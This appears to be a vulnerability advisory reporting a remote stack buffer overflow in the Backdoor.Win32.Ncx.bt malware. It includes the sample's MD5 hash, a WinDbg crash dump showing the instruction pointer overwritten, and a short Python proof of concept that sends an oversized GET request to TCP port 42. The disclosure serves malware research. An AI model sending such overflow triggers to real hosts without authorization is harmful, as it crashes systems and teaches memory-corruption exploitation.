Backdoor.Win32.Ncx.bt Remote Stack Buffer Overflow

Backdoor.Win32.Ncx.bt Remote Stack Buffer Overflow

Backdoor.Win32.Ncx.bt malware suffers from a remote stack buffer overflow vulnerability.

Threat: Backdoor.Win32.Ncx.bt
Vulnerability: Remote Stack Buffer Overflow
Description: The malware listens on TCP port 42, sending a single HTTP GET request with a packet size of 10140 bytes, will trigger the buffer overflow overwriting both EIP and structured exception handler (SEH).
Type: PE32
MD5: ad5c01b3e6d0254adfe0898c6d16f927
Vuln ID: MVID-2021-0026
Dropped files:
ASLR: False
DEP: False
Safe SEH: True
Disclosure: 01/15/2021

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
Memory Dump:
EAX : 00000000
EBX : 00000000
ECX : 41414141
EDX : 773E9D70     ntdll.773E9D70
EBP : 03301680
ESP : 03301660
ESI : 00000000
EDI : 00000000
EIP : 41414141

This dump file has an exception of interest stored in it.
The stored exception information can be accessed via .ecxr.
(1ef8.1d94): Access violation - code c0000005 (first/second chance not available)
eax=00000000 ebx=00000000 ecx=41414141 edx=773e9d70 esi=00000000 edi=00000000
eip=41414141 esp=030b1660 ebp=030b1680 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010246
41414141 ??              ???


0:003> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

*** WARNING: Unable to verify checksum for Backdoor.Win32.Ncx.bt.ad5c01b3e6d0254adfe0898c6d16f927.exe
*** ERROR: Module load completed but symbols could not be loaded for Backdoor.Win32.Ncx.bt.ad5c01b3e6d0254adfe0898c6d16f927.exe

FAULTING_IP: 
Backdoor_Win32_Ncx_bt_ad5c01b3e6d0254adfe0898c6d16f927+1555
00401555 88443418        mov     byte ptr [esp+esi+18h],al

EXCEPTION_RECORD:  031af9f4 -- (.exr 0x31af9f4)
ExceptionAddress: 00401555 (Backdoor_Win32_Ncx_bt_ad5c01b3e6d0254adfe0898c6d16f927+0x00001555)
   ExceptionCode: c0000005 (Access violation)
  ExceptionFlags: 00000000
NumberParameters: 2
   Parameter[0]: 00000001
   Parameter[1]: 031b0000
Attempt to write to address 031b0000

PROCESS_NAME:  Backdoor.Win32.Ncx.bt.ad5c01b3e6d0254adfe0898c6d16f927.exe

ERROR_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - The instruction at 0x%p referenced memory at 0x%p. The memory could not be %s.

EXCEPTION_PARAMETER1:  00000008

EXCEPTION_PARAMETER2:  41414141

WRITE_ADDRESS:  41414141 

FOLLOWUP_IP: 
Backdoor_Win32_Ncx_bt_ad5c01b3e6d0254adfe0898c6d16f927+1555
00401555 88443418        mov     byte ptr [esp+esi+18h],al

FAILED_INSTRUCTION_ADDRESS: 
+1555
41414141 ??              ???

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

IP_ON_HEAP:  02870d50
The fault address in not in any loaded module, please check your build's rebase
log at <releasedir>\bin\build_logs\timebuild\ntrebase.log for module which may
contain the address if it were loaded.

IP_IN_FREE_BLOCK: 41414141

CONTEXT:  031afa44 -- (.cxr 0x31afa44)
eax=00000041 ebx=76e8e250 ecx=396e055e edx=031afdc4 esi=00000144 edi=02870d50
eip=00401555 esp=031afea4 ebp=73c31e90 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
Backdoor_Win32_Ncx_bt_ad5c01b3e6d0254adfe0898c6d16f927+0x1555:
00401555 88443418        mov     byte ptr [esp+esi+18h],al  ss:002b:031b0000=??
Resetting default scope

FAULTING_THREAD:  ffffffff

BUGCHECK_STR:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

PRIMARY_PROBLEM_CLASS:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

DEFAULT_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141

LAST_CONTROL_TRANSFER:  from 02870d50 to 00401555

FRAME_ONE_INVALID: 1

STACK_TEXT:  
031afea4 00401555 backdoor_win32_ncx_bt+0x1555
031afea8 02870d50 unknown!unknown+0x0


STACK_COMMAND:  .cxr 00000000031AFA44 ; kb ; dds 31afea4 ; kb

SYMBOL_STACK_INDEX:  0

SYMBOL_NAME:  backdoor_win32_ncx_bt+1555

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: Backdoor_Win32_Ncx_bt_ad5c01b3e6d0254adfe0898c6d16f927

IMAGE_NAME:  Backdoor.Win32.Ncx.bt.ad5c01b3e6d0254adfe0898c6d16f927.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  34ae8eb9

BUCKET_ID:  APPLICATION_FAULT_STACK_OVERFLOW_SOFTWARE_NX_FAULT_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_BAD_IP_backdoor_win32_ncx_bt+1555

FAILURE_BUCKET_ID:  STACK_OVERFLOW_INVALID_EXPLOITABLE_FILL_PATTERN_41414141_c0000005_Backdoor.Win32.Ncx.bt.ad5c01b3e6d0254adfe0898c6d16f927.exe!Unknown

Followup: MachineOwner

Exploit/PoC:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from socket import *

MALWARE_HOST="x.x.x.x"
PORT=42

def doit():
    PACKET="GET /"+"A"*10140                                                                                               
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((MALWARE_HOST, PORT))
    s.send(PACKET)
    s.close()

    print("Backdoor.Win32.Ncx.bt / Remote Stack Buffer Overflow")
    print("MD5: ad5c01b3e6d0254adfe0898c6d16f927")
    print("By Malvuln")


if __name__=="__main__":
    doit()